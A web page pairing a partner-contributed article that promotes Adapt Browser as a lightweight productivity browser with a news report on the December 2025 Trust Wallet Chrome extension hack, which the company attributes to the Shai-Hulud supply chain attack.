As web browsers evolve into all-purpose platforms, performance and productivity often suffer. Feature overload, excessive background processes, and fragmented workflows can slow down browsing sessions and introduce unnecessary friction, especially for users who rely on the browser as a primary work environment. This article explores how adopting a lightweight, task-focused browser, like Adapt Browser , can help users browse faster, reduce distractions, and complete everyday tasks more efficiently, without relying on heavy extensions or complex configurations. The Productivity Problem With Modern Browsing For many professionals, the browser functions as a central hub for research, communication, content consumption, and operational work.

However, common challenges persist: High CPU and memory usage caused by background services Excessive tab proliferation leading to loss of context Frequent switching between browser tabs and external applications Reliance on extensions that negatively impact performance and stability These issues are not always caused by the websites themselves, but by how browsers manage processes, interfaces, and workflows. This emphasizes the importance of using a fast, lightweight browser. Some fast browsing options include Adapt Browser, Opera, Edge, and Vivaldi. Step 1: Prioritize Performance by Reducing Browser Overhead One of the most effective ways to improve browsing speed is to minimize the browser’s baseline resource consumption.

Lightweight browsers take a different architectural approach by reducing background activity and avoiding unnecessary services that run regardless of user intent. This can result in: Faster page load times Improved responsiveness when switching tabs or windows Lower memory usage on systems running multiple applications By focusing on essential functionality rather than feature parity, Adapt Browser, a performance-oriented browser, can remain responsive even during extended work sessions. Step 2: Centralize Web-Based Workflows A major source of inefficiency in browsing comes from constantly switching between tabs, windows, and desktop applications. Centralizing commonly used web tools within the browser interface helps streamline daily workflows.

This approach allows users to: Access frequently used web applications without opening new tabs Maintain visibility into active tools while browsing or researching Reduce time spent navigating between disconnected contexts Adapt Browser achieves this by keeping work-critical tools accessible in one place, so that users can maintain momentum and reduce cognitive load. Step 3: Reduce Distractions Through Interface Simplicity Interface design plays a significant role in user focus. Excessive UI elements, notifications, and visual clutter can interrupt attention and slow task completion. A streamlined browser interface emphasizes: Clean layouts with minimal visual noise Clear separation between content and controls Reduced interruption during focused work Adapt Browser supports this design philosophy for sustained attention, particularly for tasks such as reading, writing, and analysis.

Step 4: Improve Task Management With Smarter Window Usage Opening multiple tabs is often a workaround for limited visibility. Instead of relying on dozens of tabs, modern browsers can optimize how content is displayed and managed. Effective strategies include: Viewing related content side-by-side without opening additional tabs Keeping search results visible while exploring linked pages Reducing duplicate browsing actions By improving how windows and views are handled, users can stay organized while maintaining browsing speed. Adapt Browser offers this exact functionality, empowering users to adapt the browser to fit their workflow.

Applying These Principles With Adapt Browser Adapt Browser follows a lightweight design philosophy centered on performance and task efficiency. Rather than attempting to replicate feature-heavy browser ecosystems, it focuses on optimizing core browsing behavior and integrated workflows. Key characteristics include: A lightweight architecture designed to reduce CPU and memory usage Integrated access to commonly used web applications and tools Interface elements designed to reduce distraction and tab clutter Adapt is built as a non-Chromium browser , allowing greater control over resource usage and core browser behavior compared to browsers that rely on Chromium-based architectures. It is also AppEsteem certified , indicating that the browser meets established security and transparency standards for consumer software.

This approach supports users who want faster browsing and a more focused work experience without complex setup or customization. Additional technical details and updates can be found in Adapt Browser’s official website. Browsing faster and getting more done is not solely about internet speed, it is largely influenced by how the browser manages resources, workflows, and user attention. By reducing overhead, simplifying interfaces, and centralizing essential tools, a lightweight browser can significantly improve productivity.

As web-based work continues to expand, browser design choices play an increasingly important role in daily efficiency. Adopting a task-focused browsing approach can help users spend less time navigating and more time completing meaningful work. Found this article interesting? This article is a contributed piece from one of our valued partners.

Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Trust Wallet Chrome Extension Hack Drains $8.5M via Shai-Hulud Supply Chain Attack

Trust Wallet on Tuesday revealed that the second iteration of the Shai-Hulud (aka Sha1-Hulud) supply chain outbreak in November 2025 was likely responsible for the hack of its Google Chrome extension , ultimately resulting in the theft of approximately $8.5 million in assets. “Our Developer GitHub secrets were exposed in the attack, which gave the attacker access to our browser extension source code and the Chrome Web Store (CWS) API key,” the company said in a post-mortem published Tuesday. “The attacker obtained full CWS API access via the leaked key, allowing builds to be uploaded directly without Trust Wallet’s standard release process, which requires internal approval/manual review.” Subsequently, the attacker is said to have registered the domain “metrics-trustwallet[.]com” and pushed a trojanized version of the extension with a backdoor that’s capable of harvesting users’ wallet mnemonic phrases to the sub-domain “api.metrics-trustwallet[.]com.” Cybersecurity company Koi said the malicious code triggers on every unlock and not just during seed phrase import, causing sensitive data to be exfiltrated regardless of whether victims used a password or biometrics, and whether the wallet extension had been used for months or just opened once after it was updated to version 2.68. “The code loops through every wallet in the user’s account, not just the active one.

If you had multiple wallets configured, all of them were compromised,” researchers Oren Yomtov and Yuval Ronen said . “Seed phrases are stuffed into a field called errorMessage inside what looks like standard unlock telemetry. A casual code review sees an analytics event tracking unlock success with some error metadata.” The domain “metrics-trustwallet[.]com,” for its part, resolves to “138.124.70.40,” which is hosted on Stark Industries Solutions, a bulletproof hosting service provider that was incorporated in the U.K. in February 2022, just two weeks prior to Russia’s full-scale invasion of Ukraine.

It has a history of enabling Russian state-sponsored cyber operations, as well as other cybercriminal activity . Interestingly, Koi’s analysis also found that querying the server directly returned the response “ He who controls the spice controls the universe ,” a Dune reference that echoes similar references observed in the Shai-Hulud npm incident. “The Last-Modified header reveals the infrastructure was staged by December 8 – over two weeks before the malicious update was pushed on December 24,” it added. “This wasn’t opportunistic.

It was planned.” The disclosure comes days after Trust Wallet urged about one million users of its Chrome extension to update to version 2.69 after a malicious update (version 2.68) was pushed by unknown threat actors on December 24, 2025, to the browser’s extension marketplace. The security incident ultimately led to $8.5 million in cryptocurrency assets being drained from 2,520 wallet addresses to no less than 17 wallet addresses controlled by the attacker. The first wallet-draining activity was publicly reported a day after the malicious update. Trust Wallet has since initiated a reimbursement claim process for impacted victims.

The company noted that reviews of submitted claims are ongoing and are being handled on a case-by-case basis. It also stressed that processing times may vary with each case due to the need to distinguish between victims and bad actors, and further protect against fraud. To prevent such breaches from occurring again, Trust Wallet said it has implemented additional monitoring capabilities and controls related to its release processes. “Sha1-Hulud was an industry-wide software supply chain attack that affected companies across multiple sectors, including but not limited to crypto,” the company said.

“It involved malicious code being introduced and distributed through commonly-used developer tooling. This allowed attackers to gain access through trusted software dependencies rather than directly targeting individual organizations.” Trust Wallet’s disclosure coincides with the emergence of Shai-Hulud 3.0 with increased obfuscation and reliability improvements, while still remaining laser-focused on stealing secrets from developer machines. “The primary difference lies in string obfuscation, error handling, and Windows compatibility, all aimed at increasing campaign longevity rather than introducing novel exploitation techniques,” Upwind researchers Guy Gilad and Moshe Hassan said . Found this article interesting?

Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.